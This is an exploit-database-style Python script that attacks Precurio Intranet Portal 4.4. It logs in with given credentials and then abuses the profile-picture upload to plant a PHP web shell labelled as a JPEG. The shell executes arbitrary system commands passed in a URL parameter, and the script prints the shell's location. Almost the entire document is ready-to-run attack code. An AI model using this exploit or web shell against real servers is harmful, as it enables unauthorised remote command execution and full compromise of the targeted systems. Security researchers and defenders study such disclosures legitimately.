# Exploit Title: Precurio Intranet Portal 4.4 - Remote Command Execution
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 05.03.2024
# Vendor Homepage: https://www.precurio.com
# Software Link: http://bit.ly/1hWLtfW
# Tested Version: v4.4 (latest)
# Tested on: MacOS

import requests
import time
import random
import string
import sys
import re

def simulate_login(session, url, username, password):
try:
print("Logging in...")
time.sleep(1)
login_url = f"{url}/public/default/login/submit"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"username": username,
"password": password
}
response = session.post(login_url, headers=headers, data=data)
if "Welcome System" in response.text:
print("Login Successful!")
time.sleep(1)
return True
else:
print("Login Failed!")
return False
except Exception as e:
print(f"An error occurred during login: {e}")
return False

def upload_file(session, url):
try:
print("Shell Preparing...")
time.sleep(1)
upload_url = f"{url}/public/user/profile/update"
random_filename = ''.join(random.choices(string.ascii_letters + string.
digits, k=5)) + ".php"
files = {
"profile_pic": ("shell.php", '<html><body><form method="GET" name="<?php
echo basename($_SERVER[\'PHP_SELF\']); ?>"><input type="TEXT" name="cmd"
autofocus id="cmd" size="80"><input type="SUBMIT"
value="Execute"></form><pre><?php if(isset($_GET[\'cmd\'])){ system($_GET[\'
cmd\']); } ?></pre></body></html>', 'image/jpeg')
}
response = session.post(upload_url, files=files)
print("Upload Response Status:", response.status_code)
if ".php" in response.text:
path = extract_php_path(response.text)
print(f"Your shell is ready: {url}/{path}")
else:
print("Exploit Failed!", response.text[:500])
except Exception as e:
print(f"An error occurred during file upload: {e}")

def extract_php_path(html_content):
match = re.search(r'src="(/[^"]+\.php)"', html_content)
if match:
return match.group(1)
return "Path not found"

if __name__ == "__main__":
try:
if len(sys.argv) != 4:
print("Usage: python script.py <url> <username> <password>")
sys.exit(1)

session = requests.Session()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

if simulate_login(session, url, username, password):
upload_file(session, url)
else:
print("Cannot proceed without a valid login.")
except Exception as e:
print(f"An error occurred: {e}")